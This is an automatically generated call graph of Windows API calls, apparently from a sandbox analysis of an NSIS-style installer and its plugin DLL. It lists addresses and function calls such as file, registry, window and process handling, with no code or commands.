3328->3329 3330 73c61b46 3329->3330 3331 73c61b52 3329->3331 3332 73c615eb 2 API calls 3330->3332 3333 73c61b73 3331->3333 3334 73c61b5c 3331->3334 3337 73c61b50 3332->3337 3335 73c61b9f 3333->3335 3336 73c61b79 3333->3336 3338 73c615c5 3 API calls 3334->3338 3340 73c615c5 3 API calls 3335->3340 3339 73c61668 3 API calls 3336->3339 3341 73c61b61 3338->3341 3342 73c61b7e 3339->3342 3340->3337 3343 73c61668 3 API calls 3341->3343 3345 73c615eb 2 API calls 3342->3345 3344 73c61b67 3343->3344 3346 73c615eb 2 API calls 3344->3346 3347 73c61b84 GlobalFree 3345->3347 3348 73c61b6d GlobalFree 3346->3348 3347->3337 3347->3348 3366 40362d 3367 403653 3366->3367 3368 40363f SetTimer 3366->3368 3369 40365c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3367->3369 3370 4036aa 3367->3370 3368->3369 3369->3370 2411 404f70 2412 405111 2411->2412 2413 404f8f 2411->2413 2415 405125 GetDlgItem GetDlgItem 2412->2415 2420 40515e 2412->2420 2413->2412 2414 404f9b 2413->2414 2417 404fa0 SetWindowPos 2414->2417 2418 404fba 2414->2418 2419 4054f8 18 API calls 2415->2419 2416 4051b5 2437 40510c 2416->2437 2482 4054c6 2416->2482 2421 4050fd 2417->2421 2423 40500d 2418->2423 2424 404fbf ShowWindow 2418->2424 2425 405148 SetClassLongW 2419->2425 2420->2416 2426 401399 90 API calls 2420->2426 2521 405739 2421->2521 2428 405015 DestroyWindow 2423->2428 2429 40502f 2423->2429 2424->2421 2427 404fe4 GetWindowLongW 2424->2427 2430 401533 90 API calls 2425->2430 2431 40518e 2426->2431 2427->2421 2433 405000 ShowWindow 2427->2433 2434 405446 2428->2434 2435 405034 SetWindowLongW 2429->2435 2436 405047 2429->2436 2430->2420 2431->2416 2439 405192 SendMessageW 2431->2439 2433->2421 2434->2437 2444 405479 ShowWindow 2434->2444 2435->2437 2436->2421 2438 405053 GetDlgItem 2436->2438 2442 405092 2438->2442 2443 40506f SendMessageW IsWindowEnabled 2438->2443 2439->2437 2440 401533 90 API calls 2473 4051c7 2440->2473 2441 405448 DestroyWindow EndDialog 2441->2434 2447 4050a1 2442->2447 2449 4050e4 SendMessageW 2442->2449 2450 4050b3 2442->2450 2457 405099 2442->2457 2443->2437 2446 40508e 2443->2446 2444->2437 2446->2442 2447->2449 2447->2457 2449->2421 2452 4050ca 2450->2452 2453 4050bc 2450->2453 2451 4050e2 2451->2421 2456 401533 90 API calls 2452->2456 2515 401533 2453->2515 2454 4054f8 18 API calls 2454->2473 2458 4050d1 2456->2458 2518 405936 2457->2518 2458->2421 2458->2457 2460 40524b GetDlgItem 2461 405272 ShowWindow KiUserCallbackDispatcher KiUserCallbackDispatcher EnableWindow 2460->2461 2465 405266 2460->2465 2461->2465 2462 4052c7 GetSystemMenu EnableMenuItem SendMessageW 2463 4052f4 SendMessageW 2462->2463 2462->2465 2463->2465 2465->2461 2465->2462 2505 4054e1 SendMessageW 2465->2505 2506 405cf9 2465->2506 2509 406af8 lstrcpynW 2465->2509 2468 405326 lstrlenW 2469 405e98 17 API calls 2468->2469 2470 405340 SetWindowTextW 2469->2470 2510 401399 2470->2510 2472 405388 DestroyWindow 2472->2434 2474 4053a2 CreateDialogParamW 2472->2474 2473->2437 2473->2440 2473->2441 2473->2454 2473->2472 2485 405e98 2473->2485 2502 4054f8 2473->2502 2474->2434 2475 4053d5 2474->2475 2476 4054f8 18 API calls 2475->2476 2477 4053e0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2476->2477 2478 401399 90 API calls 2477->2478 2479 405426 2478->2479 2479->2437 2480 40542e ShowWindow 2479->2480 2481 4054c6 SendMessageW 2480->2481 2481->2434 2483 4054de 2482->2483 2484 4054cf SendMessageW 2482->2484 2483->2473 2484->2483 2497 405ea3 2485->2497 2486 4060dc 2487 4060f1 2486->2487 2542 406af8 lstrcpynW 2486->2542 2487->2473 2490 4060a7 lstrlenW 2490->2497 2491 405fbc GetSystemDirectoryW 2491->2497 2492 405fcf GetWindowsDirectoryW 2492->2497 2495 405e98 10 API calls 2495->2490 2496 405ffc SHGetSpecialFolderLocation 2496->2497 2498 406014 SHGetPathFromIDListW CoTaskMemFree 2496->2498 2497->2486 2497->2490 2497->2491 2497->2492 2497->2495 2497->2496 2499 405e98 10 API calls 2497->2499 2500 406d1b CharNextW CharNextW CharNextW CharNextW CharPrevW 2497->2500 2501 406048 lstrcatW 2497->2501 2535 406955 2497->2535 2540 4065fd wsprintfW 2497->2540 2541 406af8 lstrcpynW 2497->2541 2498->2497 2499->2497 2500->2497 2501->2497 2503 405e98 17 API calls 2502->2503 2504 405503 SetDlgItemTextW 2503->2504 2504->2460 2505->2465 2507 405e98 17 API calls 2506->2507 2508 405d07 SetWindowTextW 2507->2508 2508->2465 2509->2468 2511 401413 2510->2511 2513 4013a3 2510->2513 2511->2473 2513->2511 2514 4013df MulDiv SendMessageW 2513->2514 2547 40154a 2513->2547 2514->2513 2516 401399 90 API calls 2515->2516 2517 401547 2516->2517 2517->2457 2519 405943 SendMessageW 2518->2519 2520 40593d 2518->2520 2519->2451 2520->2519 2522 405751 GetWindowLongW 2521->2522 2532 405807 2521->2532 2523 405766 2522->2523 2522->2532 2524 40579a 2523->2524 2525 40578e GetSysColor 2523->2525 2523->2532 2526 4057a8 SetBkMode 2524->2526 2527 40579e SetTextColor 2524->2527 2525->2524 2528 4057d0 2526->2528 2529 4057c1 GetSysColor 2526->2529 2527->2526 2530 4057e1 2528->2530 2531 4057d4 SetBkColor 2528->2531 2529->2528 2530->2532 2533 4057f1 DeleteObject 2530->2533 2534 4057fa CreateBrushIndirect 2530->2534 2531->2530 2532->2437 2533->2534 2534->2532 2543 4062b6 2535->2543 2538 40698a RegQueryValueExW RegCloseKey 2539 4069bb 2538->2539 2539->2497 2540->2497 2541->2497 2542->2487 2544 4062c5 2543->2544 2545 4062c9 2544->2545 2546 4062ce RegOpenKeyExW 2544->2546 2545->2538 2545->2539 2546->2545 2548 4015c3 2547->2548 2593 4015ce 2547->2593 2549 4016c1 2548->2549 2550 4017c2 2548->2550 2551 4015e6 2548->2551 2552 4018cb 2548->2552 2553 4016ef 2548->2553 2554 4016af 2548->2554 2555 40182f 2548->2555 2556 401711 2548->2556 2557 401633 SetForegroundWindow 2548->2557 2558 4017d3 2548->2558 2559 401618 2548->2559 2560 40189b 2548->2560 2561 4018de 2548->2561 2575 4015d5 2548->2575 2579 4015f9 2548->2579 2587 40163f 2548->2587 2548->2593 2610 40160c 2548->2610 2573 4016d1 ShowWindow 2549->2573 2574 4016d9 2549->2574 2564 40303e 17 API calls 2550->2564 2563 4015f0 PostQuitMessage 2551->2563 2551->2593 2568 40303e 17 API calls 2552->2568 2661 40303e 2553->2661 2730 4065fd wsprintfW 2554->2730 2571 40303e 17 API calls 2555->2571 2565 40303e 17 API calls 2556->2565 2557->2593 2567 40303e 17 API calls 2558->2567 2658 403002 2559->2658 2566 40303e 17 API calls 2560->2566 2570 40303e 17 API calls 2561->2570 2563->2593 2578 4017c8 2564->2578 2580 401718 2565->2580 2581 4018a2 SearchPathW 2566->2581 2583 4017da 2567->2583 2584 4018d2 2568->2584 2586 4018e5 2570->2586 2588 401835 GetFullPathNameW 2571->2588 2573->2574 2589 4016e6 ShowWindow 2574->2589 2574->2593 2576 405d18 24 API calls 2575->2576 2575->2593 2576->2593 2734 4065ad FindFirstFileW 2578->2734 2591 401399 73 API calls 2579->2591 2666 406ba3 CharNextW CharNextW 2580->2666 2581->2593 2582 405d18 24 API calls 2582->2593 2594 40303e 17 API calls 2583->2594 2696 406a34 2584->2696 2585 40161e Sleep 2585->2593 2603 401906 2586->2603 2604 40190e 2586->2604 2587->2593 2596 403002 17 API calls 2587->2596 2597 401857 2588->2597 2598 40184d 2588->2598 2589->2593 2591->2593 2593->2513 2599 4017e3 2594->2599 2596->2593 2597->2598 2611 4065ad 2 API calls 2597->2611 2598->2593 2600 401889 GetShortPathNameW 2598->2600 2602 40303e 17 API calls 2599->2602 2600->2593 2601 401780 2609 401790 2601->2609 2601->2610 2606 4017ec MoveFileW 2602->2606 2742 406af8 lstrcpynW 2603->2742 2743 406af8 lstrcpynW 2604->2743 2606->2610 2613 401804 2606->2613 2684 405d18 2609->2684 2610->2582 2612 40186a 2611->2612 2612->2598 2741 406af8 lstrcpynW 2612->2741 2613->2593 2621 4065ad 2 API calls 2613->2621 2614 40190c 2700 406d1b 2614->2700 2615 401919 2744 406534 lstrlenW CharPrevW 2615->2744 2627 401814 2621->2627 2625 4017a2 SetCurrentDirectoryW 2625->2593 2627->2593 2737 40621b MoveFileExW 2627->2737 2628 401720 2628->2601 2630 401769 GetFileAttributesW 2628->2630 2672 4065d4 2628->2672 2676 4064da 2628->2676 2679 405e1c CreateDirectoryW 2628->2679 2731 405dfc CreateDirectoryW 2628->2731 2630->2628 2631 4065ad 2 API calls 2653 40192b 2631->2653 2632 401968 2747 406b7b GetFileAttributesW 2632->2747 2636 40193f CompareFileTime 2636->2653 2637 401a18 2639 405d18 24 API calls 2637->2639 2638 4019fd 2641 405d18 24 API calls 2638->2641 2642 401a24 2639->2642 2640 406af8 lstrcpynW 2640->2653 2641->2593 2710 403148 2642->2710 2645 401a52 SetFileTime 2646 401a60 CloseHandle 2645->2646 2646->2593 2648 401a73 2646->2648 2647 405e98 17 API calls 2647->2653 2649 401a78 2648->2649 2650 401a89 2648->2650 2651 405e98 17 API calls 2649->2651 2652 405e98 17 API calls 2650->2652 2654 401a80 lstrcatW 2651->2654 2655 401a91 2652->2655 2653->2575 2653->2631 2653->2632 2653->2636 2653->2637 2653->2638 2653->2640 2653->2647 2709 4068f9 GetFileAttributesW CreateFileW 2653->2709 2750 406a86 2653->2750 2654->2655 2657 406a86 MessageBoxIndirectW 2655->2657 2657->2593 2659 405e98 17 API calls 2658->2659 2660 403016 2659->2660 2660->2585 2662 405e98 17 API calls 2661->2662 2663 403067 2662->2663 2664 4016f6 SetFileAttributesW 2663->2664 2665 406d1b 5 API calls 2663->2665 2664->2593 2665->2664 2667 406bc1 2666->2667 2671 406bf8 2666->2671 2668 406bd0 CharNextW 2667->2668 2670 406bd5 2667->2670 2668->2671 2669 4065d4 CharNextW 2669->2670 2670->2669 2670->2671 2671->2628 2673 4065e0 2672->2673 2674 4065fa 2672->2674 2673->2674 2675 4065e9 CharNextW 2673->2675 2674->2628 2675->2673 2675->2674 2754 4068c4 GetModuleHandleA 2676->2754 2680 405e67 GetLastError 2679->2680 2681 405e8a 2679->2681 2680->2681 2682 405e74 SetFileSecurityW 2680->2682 2681->2628 2682->2681 2683 405e8e GetLastError 2682->2683 2683->2681 2685 405d2a 2684->2685 2694 401797 2684->2694 2686 405d49 lstrlenW 2685->2686 2687 405e98 17 API calls 2685->2687 2688 405d5b lstrlenW 2686->2688 2689 405d7e 2686->2689 2687->2686 2690 405d70 lstrcatW 2688->2690 2688->2694 2691 405d95 2689->2691 2692 405d88 SetWindowTextW 2689->2692 2690->2689 2693 405d9a SendMessageW SendMessageW SendMessageW 2691->2693 2691->2694 2692->2691 2693->2694 2695 406af8 lstrcpynW 2694->2695 2695->2625 2697 406a41 GetTickCount GetTempFileNameW 2696->2697 2698 406a75 2697->2698 2699 406a79 2697->2699 2698->2697 2698->2699 2699->2593 2701 406d30 2700->2701 2703 406da3 CharNextW 2701->2703 2704 406db2 2701->2704 2705 4065d4 CharNextW 2701->2705 2707 406d8f CharNextW 2701->2707 2708 406d9e CharNextW 2701->2708 2702 406dba CharPrevW 2702->2704 2703->2701 2703->2704 2704->2702 2706 406dda 2704->2706 2705->2701 2706->2653 2707->2701 2708->2703 2709->2653 2711 403190 2710->2711 2712 403183 2710->2712 2763 406926 ReadFile 2711->2763 2770 403131 SetFilePointer 2712->2770 2716 401a3a 2716->2645 2716->2646 2717 4031b6 GetTickCount 2717->2716 2725 4031e6 2717->2725 2718 4032f9 2719 403340 2718->2719 2723 4032fd 2718->2723 2721 40311b ReadFile 2719->2721 2721->2716 2722 40311b ReadFile 2722->2723 2723->2716 2723->2722 2724 4069e9 WriteFile 2723->2724 2724->2723 2725->2716 2726 40323d GetTickCount 2725->2726 2727 40326e MulDiv wsprintfW 2725->2727 2765 40311b 2725->2765 2768 4069e9 WriteFile 2725->2768 2726->2725 2728 405d18 24 API calls 2727->2728 2728->2725 2730->2593 2732 405e16 2731->2732 2733 405e0e GetLastError 2731->2733 2732->2628 2733->2732 2735 4065c3 FindClose 2734->2735 2736 4065ce 2734->2736 2735->2736 2736->2593 2738 40623c 2737->2738 2739 40622f 2737->2739 2738->2610 2771 4062e4 2739->2771 2741->2598 2742->2614 2743->2615 2745 406551 lstrcatW 2744->2745 2746 40191f lstrcatW 2744->2746 2745->2746 2746->2614 2748 406b9d 2747->2748 2749 406b8d SetFileAttributesW 2747->2749 2748->2653 2749->2748 2751 406a9b 2750->2751 2752 406ae9 2751->2752 2753 406ab1 MessageBoxIndirectW 2751->2753 2752->2653 2753->2752 2755 4068e6 GetProcAddress 2754->2755 2756 4068dc 2754->2756 2758 4064e1 2755->2758 2760 40617c GetSystemDirectoryW 2756->2760 2758->2628 2759 4068e2 2759->2755 2759->2758 2762 40619e wsprintfW LoadLibraryExW 2760->2762 2762->2759 2764 4031a2 2763->2764 2764->2716 2764->2717 2764->2718 2766 406926 ReadFile 2765->2766 2767 40312e 2766->2767 2767->2725 2769 406a0a 2768->2769 2769->2725 2770->2711 2772 406314 2771->2772 2773 40633a GetShortPathNameW 2771->2773 2798 4068f9 GetFileAttributesW CreateFileW 2772->2798 2775 40641a 2773->2775 2776 40634f 2773->2776 2775->2738 2776->2775 2778 406357 wsprintfA 2776->2778 2777 40631e CloseHandle GetShortPathNameW 2777->2775 2780 406332 2777->2780 2779 405e98 17 API calls 2778->2779 2781 406380 2779->2781 2780->2773 2780->2775 2799 4068f9 GetFileAttributesW CreateFileW 2781->2799 2783 40638d 2783->2775 2784 406398 GetFileSize GlobalAlloc 2783->2784 2785 406413 CloseHandle 2784->2785 2786 4063b7 2784->2786 2785->2775 2787 406926 ReadFile 2786->2787 2788 4063bf 2787->2788 2788->2785 2800 406b14 lstrlenA lstrlenA 2788->2800 2791 4063d2 lstrcpyA 2794 4063e4 2791->2794 2792 40641f 2793 406b14 3 API calls 2792->2793 2793->2794 2795 4063f5 SetFilePointer 2794->2795 2796 4069e9 WriteFile 2795->2796 2797 40640c GlobalFree 2796->2797 2797->2785 2798->2777 2799->2783 2801 406b33 2800->2801 2802 4063ce 2800->2802 2801->2802 2803 406b60 lstrlenA 2801->2803 2802->2791 2802->2792 2803->2801 2803->2802 3318 73c62ebf 3319 73c62ed7 3318->3319 3320 73c61309 2 API calls 3319->3320 3321 73c62ef2 3320->3321 2804 4036da SetErrorMode GetVersionExW 2805 403725 GetVersionExW 2804->2805 2807 40375c 2804->2807 2806 403747 2805->2806 2806->2807 2808 4037c3 2807->2808 2809 4068c4 5 API calls 2807->2809 2810 40617c 3 API calls 2808->2810 2809->2808 2811 4037d9 lstrlenA 2810->2811 2811->2808 2812 4037e7 2811->2812 2813 4068c4 5 API calls 2812->2813 2814 4037ee 2813->2814 2815 4068c4 5 API calls 2814->2815 2816 4037f5 2815->2816 2817 4068c4 5 API calls 2816->2817 2818 403801 #17 OleInitialize SHGetFileInfoW 2817->2818 2894 406af8 lstrcpynW 2818->2894 2821 40384f GetCommandLineW 2895 406af8 lstrcpynW 2821->2895 2823 403860 2824 4065d4 CharNextW 2823->2824 2825 40389a CharNextW 2824->2825 2826 403988 GetTempPathW 2825->2826 2834 4038b3 2825->2834 2896 403c83 2826->2896 2828 4039a0 2829 4039a4 GetWindowsDirectoryW lstrcatW 2828->2829 2830 4039fa DeleteFileW 2828->2830 2831 403c83 12 API calls 2829->2831 2906 4033cb GetTickCount GetModuleFileNameW 2830->2906 2835 4039c0 2831->2835 2833 403a0d 2837 403a90 2833->2837 2840 4065d4 CharNextW 2833->2840 2878 403a82 2833->2878 2834->2826 2836 4065d4 CharNextW 2834->2836 2843 403974 2834->2843 2835->2830 2838 4039c4 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2835->2838 2836->2834 3013 4036b0 2837->3013 2839 403c83 12 API calls 2838->2839 2844 4039f2 2839->2844 2854 403a2c 2840->2854 2995 406af8 lstrcpynW 2843->2995 2844->2830 2844->2837 2847 403bd7 2851 406a86 MessageBoxIndirectW 2847->2851 2848 403bea 2849 403bf3 GetCurrentProcess OpenProcessToken 2848->2849 2850 403be2 ExitProcess 2848->2850 2852 403c0b LookupPrivilegeValueW AdjustTokenPrivileges 2849->2852 2853 403c3f 2849->2853 2851->2850 2852->2853 2858 4068c4 5 API calls 2853->2858 2855 403a56 2854->2855 2856 403a97 2854->2856 2996 406616 2855->2996 2859 4064da 5 API calls 2856->2859 2869 403c46 2858->2869 2861 403a9c lstrcatW 2859->2861 2864 403ac0 lstrcatW lstrcmpiW 2861->2864 2865 403ab1 lstrcatW 2861->2865 2863 403c5b ExitWindowsEx 2863->2850 2866 403c68 2863->2866 2864->2837 2867 403ae7 2864->2867 2865->2864 2870 401533 90 API calls 2866->2870 2871 403af0 2867->2871 2872 403af7 2867->2872 2869->2863 2869->2866 2870->2850 2875 405e1c 4 API calls 2871->2875 2876 405dfc 2 API calls 2872->2876 2873 403a77 3011 406af8 lstrcpynW 2873->3011 2879 403af5 2875->2879 2877 403afc SetCurrentDirectoryW 2876->2877 2880 403b10 2877->2880 2881 403b1f 2877->2881 2934 405a1c 2878->2934 2879->2877 3012 406af8 lstrcpynW 2880->3012 2991 406af8 lstrcpynW 2881->2991 2884 405e98 17 API calls 2885 403b4f DeleteFileW 2884->2885 2886 403b5a CopyFileW 2885->2886 2891 403b2d 2885->2891 2886->2891 2887 403bb3 2888 40621b 35 API calls 2887->2888 2888->2837 2889 40621b 35 API calls 2889->2891 2890 405e98 17 API calls 2890->2891 2891->2884 2891->2887 2891->2889 2891->2890 2893 403b9e CloseHandle 2891->2893 2992 4066b4 CreateProcessW 2891->2992 2893->2891 2894->2821 2895->2823 2897 406d1b 5 API calls 2896->2897 2899 403c8f 2897->2899 2898 403c99 2898->2828 2899->2898 2900 406534 3 API calls 2899->2900 2901 403ca1 2900->2901 2902 405dfc 2 API calls 2901->2902 2903 403ca7 2902->2903 2904 406a34 2 API calls 2903->2904 2905 403cb2 2904->2905 2905->2828 3020 4068f9 GetFileAttributesW CreateFileW 2906->3020 2908 40340d 2909 40341a 2908->2909 3021 406af8 lstrcpynW 2908->3021 2909->2833 2911 403430 3022 406cee lstrlenW 2911->3022 2915 403441 GetFileSize 2916 40345a 2915->2916 2931 403548 2915->2931 2916->2909 2919 40311b ReadFile 2916->2919 2921 403616 2916->2921 2928 403367 6 API calls 2916->2928 2916->2931 2918 403557 2918->2909 2920 403598 GlobalAlloc 2918->2920 3038 403131 SetFilePointer 2918->3038 2919->2916 3039 403131 SetFilePointer 2920->3039 2923 403367 6 API calls 2921->2923 2923->2909 2925 403574 2927 406926 ReadFile 2925->2927 2926 4035b5 2929 403148 31 API calls 2926->2929 2930 403586 2927->2930 2928->2916 2932 4035c4 2929->2932 2930->2909 2930->2920 3027 403367 2931->3027 2932->2909 2932->2932 2933 4035f4 SetFilePointer 2932->2933 2933->2909 2935 4068c4 5 API calls 2934->2935 2936 405a30 2935->2936 2937 405a39 2936->2937 2938 405a4b 2936->2938 3052 4065fd wsprintfW 2937->3052 2939 406955 3 API calls 2938->2939 2940 405a7a 2939->2940 2941 405a99 lstrcatW 2940->2941 2943 406955 3 API calls 2940->2943 2944 405a49 2941->2944 2943->2941 3044 40595d 2944->3044 2947 406616 18 API calls 2948 405acb 2947->2948 2949 405b65 2948->2949 2951 406955 3 API calls 2948->2951 2950 406616 18 API calls 2949->2950 2952 405b6b 2950->2952 2954 405afe 2951->2954 2953 405b7b LoadImageW 2952->2953 2955 405e98 17 API calls 2952->2955 2956 405c28 2953->2956 2957 405bab RegisterClassW 2953->2957 2954->2949 2958 405b22 lstrlenW 2954->2958 2961 4065d4 CharNextW 2954->2961 2955->2953 2960 401533 90 API calls 2956->2960 2959 405bdf SystemParametersInfoW CreateWindowExW 2957->2959 2990 405bd8 2957->2990 2962 405b32 lstrcmpiW 2958->2962 2963 405b58 2958->2963 2959->2956 2964 405c2e 2960->2964 2965 405b1d 2961->2965 2962->2963 2966 405b42 GetFileAttributesW 2962->2966 2967 406534 3 API calls 2963->2967 2969 40595d 18 API calls 2964->2969 2964->2990 2965->2958 2968 405b4e 2966->2968 2970 405b5e 2967->2970 2968->2963 2971 406cee 2 API calls 2968->2971 2972 405c3b 2969->2972 3053 406af8 lstrcpynW 2970->3053 2971->2963 2974 405c47 ShowWindow 2972->2974 2975 405cc9 2972->2975 2977 40617c 3 API calls 2974->2977 3054 405842 OleInitialize 2975->3054 2979 405c5f 2977->2979 2978 405ccf 2980 405cd3 2978->2980 2981 405ced 2978->2981 2982 405c6d GetClassInfoW 2979->2982 2983 40617c 3 API calls 2979->2983 2989 401533 90 API calls 2980->2989 2980->2990 2984 401533 90 API calls 2981->2984 2985 405c80 GetClassInfoW RegisterClassW 2982->2985 2986 405c96 DialogBoxParamW 2982->2986 2983->2982 2987 405cf4 2984->2987 2985->2986 2988 401533 90 API calls 2986->2988 2987->2987 2988->2990 2989->2990 2990->2837 2991->2891 2993 4066f3 2992->2993 2994 4066e7 CloseHandle 2992->2994 2993->2891 2994->2993 2995->2826 3062 406af8 lstrcpynW 2996->3062 2998 406627 2999 406ba3 4 API calls 2998->2999 3000 40662d 2999->3000 3001 403a64 3000->3001 3002 406d1b 5 API calls 3000->3002 3001->2837 3010 406af8 lstrcpynW 3001->3010 3008 406639 3002->3008 3003 406669 lstrlenW 3004 406675 3003->3004 3003->3008 3005 406534 3 API calls 3004->3005 3007 40667a GetFileAttributesW 3005->3007 3006 4065ad 2 API calls 3006->3008 3007->3001 3008->3001 3008->3003 3008->3006 3009 406cee 2 API calls 3008->3009 3009->3003 3010->2873 3011->2878 3012->2881 3014 4036c8 3013->3014 3015 4036ba CloseHandle 3013->3015 3063 403cf1 3014->3063 3015->3014 3020->2908 3021->2911 3023 406cfd 3022->3023 3024 406d03 CharPrevW 3023->3024 3025 403436 3023->3025 3024->3023 3024->3025 3026 406af8 lstrcpynW 3025->3026 3026->2915 3028 403386 3027->3028 3029 40336e 3027->3029 3030 403397 GetTickCount 3028->3030 3031 40338f 3028->3031 3032 403377 DestroyWindow 3029->3032 3033 40337e 3029->3033 3035 4033a5 CreateDialogParamW ShowWindow 3030->3035 3036 4033ca 3030->3036 3040 4061ed 3031->3040 3032->3033 3033->2918 3035->3036 3036->2918 3038->2925 3039->2926 3041 4061ff PeekMessageW 3040->3041 3042 4061f5 DispatchMessageW 3041->3042 3043 403396 3041->3043 3042->3041 3043->2918 3045 405970 3044->3045 3061 4065fd wsprintfW 3045->3061 3047 4059e9 3048 405cf9 18 API calls 3047->3048 3050 4059ee 3048->3050 3049 405a17 3049->2947 3050->3049 3051 405e98 17 API calls 3050->3051 3051->3050 3052->2944 3053->2949 3055 4054c6 SendMessageW 3054->3055 3056 405865 3055->3056 3059 401399 90 API calls 3056->3059 3060 40588c 3056->3060 3057 4054c6 SendMessageW 3058 40589e OleUninitialize 3057->3058 3058->2978 3059->3056 3060->3057 3061->3047 3062->2998 3064 403cff 3063->3064 3065 4036cd 3064->3065 3066 403d04 FreeLibrary GlobalFree 3064->3066 3067 4066f7 3065->3067 3066->3065 3066->3066 3068 406616 18 API calls 3067->3068 3069 406719 3068->3069 3070 406722 DeleteFileW 3069->3070 3071 406739 3069->3071 3072 4036d9 OleUninitialize 3070->3072 3071->3072 3074 406859 3071->3074 3106 406af8 lstrcpynW 3071->3106 3072->2847 3072->2848 3074->3072 3078 4065ad 2 API calls 3074->3078 3075 406761 3076 406779 3075->3076 3077 40676b lstrcatW 3075->3077 3080 406cee 2 API calls 3076->3080 3079 40677f 3077->3079 3081 406876 3078->3081 3082 406790 lstrcatW 3079->3082 3084 406798 lstrlenW FindFirstFileW 3079->3084 3080->3079 3081->3072 3083 40687a 3081->3083 3082->3084 3085 406534 3 API calls 3083->3085 3084->3074 3086 4067c1 3084->3086 3087 406880 3085->3087 3091 40683b FindNextFileW 3086->3091 3100 4066f7 59 API calls 3086->3100 3103 406807 3086->3103 3107 406af8 lstrcpynW 3086->3107 3088 406563 5 API calls 3087->3088 3089 40688c 3088->3089 3092 406890 3089->3092 3093 4068af 3089->3093 3091->3086 3094 406852 FindClose 3091->3094 3092->3072 3096 405d18 24 API calls 3092->3096 3095 405d18 24 API calls 3093->3095 3094->3074 3095->3072 3097 40689c 3096->3097 3099 40621b 35 API calls 3097->3099 3101 4068a5 3099->3101 3100->3103 3101->3072 3102 405d18 24 API calls 3102->3091 3103->3091 3103->3102 3104 405d18 24 API calls 3103->3104 3105 40621b 35 API calls 3103->3105 3108 406563 3103->3108 3104->3103 3105->3103 3106->3075 3107->3086 3109 406b7b 2 API calls 3108->3109 3110 40656f 3109->3110 3111 406587 DeleteFileW 3110->3111 3112 40657f RemoveDirectoryW 3110->3112 3114 406591 3110->3114 3113 40658d 3111->3113 3112->3113 3113->3114 3115 40659c SetFileAttributesW 3113->3115 3114->3103 3115->3114 3119 73c6167a 3120 73c616b7 3119->3120 3161 73c62351 3120->3161 3122 73c616be 3123 73c617ef 3122->3123 3124 73c616d6 3122->3124 3125 73c616cf 3122->3125 3191 73c62049 3124->3191 3207 73c61fcb 3125->3207 3130 73c61700 3131 73c61722 3130->3131 3132 73c61740 3130->3132 3220 73c62209 3131->3220 3136 73c61746 3132->3136 3137 73c61791 3132->3137 3133 73c6170a 3133->3130 3217 73c62f9f 3133->3217 3134 73c616eb 3139 73c616f5 3134->3139 3140 73c61702 3134->3140 3239 73c61f1e 3136->3239 3144 73c62209 10 API calls 3137->3144 3138 73c61728 3231 73c61668 3138->3231 3139->3130 3201 73c62d14 3139->3201 3211 73c617f7 3140->3211 3148 73c6177e 3144->3148 3152 73c617de 3148->3152 3244 73c6200d 3148->3244 3150 73c61708 3150->3130 3151 73c62209 10 API calls 3151->3148 3152->3123 3156 73c617e8 GlobalFree 3152->3156 3156->3123 3158 73c617cf 3158->3152 3248 73c615c5 wsprintfW 3158->3248 3159 73c617c2 FreeLibrary 3159->3158 3251 73c612f8 GlobalAlloc 3161->3251 3163 73c6237f 3252 73c612f8 GlobalAlloc 3163->3252 3165 73c62a3a GlobalFree GlobalFree GlobalFree 3166 73c62a5a 3165->3166 3182 73c62aa7 3165->3182 3167 73c62af7 3166->3167 3172 73c62a73 3166->3172 3166->3182 3169 73c62b19 GetModuleHandleW 3167->3169 3167->3182 3168 73c62947 GlobalAlloc 3185 73c6238a 3168->3185 3170 73c62b3f 3169->3170 3171 73c62b2a LoadLibraryW 3169->3171 3259 73c61f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 3170->3259 3171->3170 3171->3182 3178 73c612e1 2 API calls 3172->3178 3172->3182 3174 73c6299f lstrcpyW 3174->3185 3175 73c629bd GlobalFree 3175->3185 3176 73c62b8e 3177 73c62b9c lstrlenW 3176->3177 3176->3182 3260 73c61f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 3177->3260 3178->3182 3179 73c629af lstrcpyW 3179->3185 3180 73c62b4c 3180->3176 3188 73c62b78 GetProcAddress 3180->3188 3182->3122 3183 73c62bb6 3183->3182 3185->3165 3185->3168 3185->3174 3185->3175 3185->3179 3186 73c62822 GlobalFree 3185->3186 3190 73c629fb 3185->3190 3253 73c612f8 GlobalAlloc 3185->3253 3254 73c612e1 3185->3254 3186->3185 3188->3176 3190->3185 3257 73c61309 GlobalSize GlobalAlloc 3190->3257 3193 73c6205e 3191->3193 3192 73c612e1 lstrcpynW GlobalAlloc 3192->3193 3193->3192 3194 73c6208b 3193->3194 3196 73c62124 GlobalAlloc WideCharToMultiByte 3193->3196 3197 73c62154 GlobalAlloc 3193->3197 3198 73c621be GlobalFree 3193->3198 3194->3193 3194->3198 3262 73c61548 3194->3262 3267 73c619db 3194->3267 3196->3198 3197->3194 3198->3193 3199 73c616dc 3198->3199 3199->3130 3199->3133 3199->3134 3203 73c62d26 3201->3203 3202 73c62dcb VirtualAlloc 3206 73c62de9 3202->3206 3203->3202 3270 73c62cbf 3206->3270 3208 73c61fde 3207->3208 3209 73c61fe9 GlobalAlloc 3208->3209 3210 73c616d5 3208->3210 3209->3208 3210->3124 3215 73c61823 3211->3215 3212 73c61897 GlobalAlloc 3216 73c618b5 3212->3216 3213 73c618a8 3214 73c618ac GlobalSize 3213->3214 3213->3216 3214->3216 3215->3212 3215->3213 3216->3150 3218 73c62faa 3217->3218 3219 73c62fea GlobalFree 3218->3219 3273 73c612f8 GlobalAlloc 3220->3273 3222 73c622a6 StringFromGUID2 3228 73c62211 3222->3228 3223 73c622b7 lstrcpynW 3223->3228 3224 73c62280 MultiByteToWideChar 3224->3228 3225 73c622ca wsprintfW 3225->3228 3226 73c622ee GlobalFree 3226->3228 3227 73c62325 GlobalFree 3227->3138 3228->3222 3228->3223 3228->3224 3228->3225 3228->3226 3228->3227 3229 73c615eb 2 API calls 3228->3229 3274 73c61638 3228->3274 3229->3228 3278 73c612f8 GlobalAlloc 3231->3278 3233 73c6166d 3234 73c61f1e 2 API calls 3233->3234 3235 73c61677 3234->3235 3236 73c615eb 3235->3236 3237 73c615f4 GlobalAlloc lstrcpynW 3236->3237 3238 73c61633 GlobalFree 3236->3238 3237->3238 3238->3148 3240 73c61f5c lstrcpyW 3239->3240 3243 73c61f2b wsprintfW 3239->3243 3241 73c61765 3240->3241 3241->3151 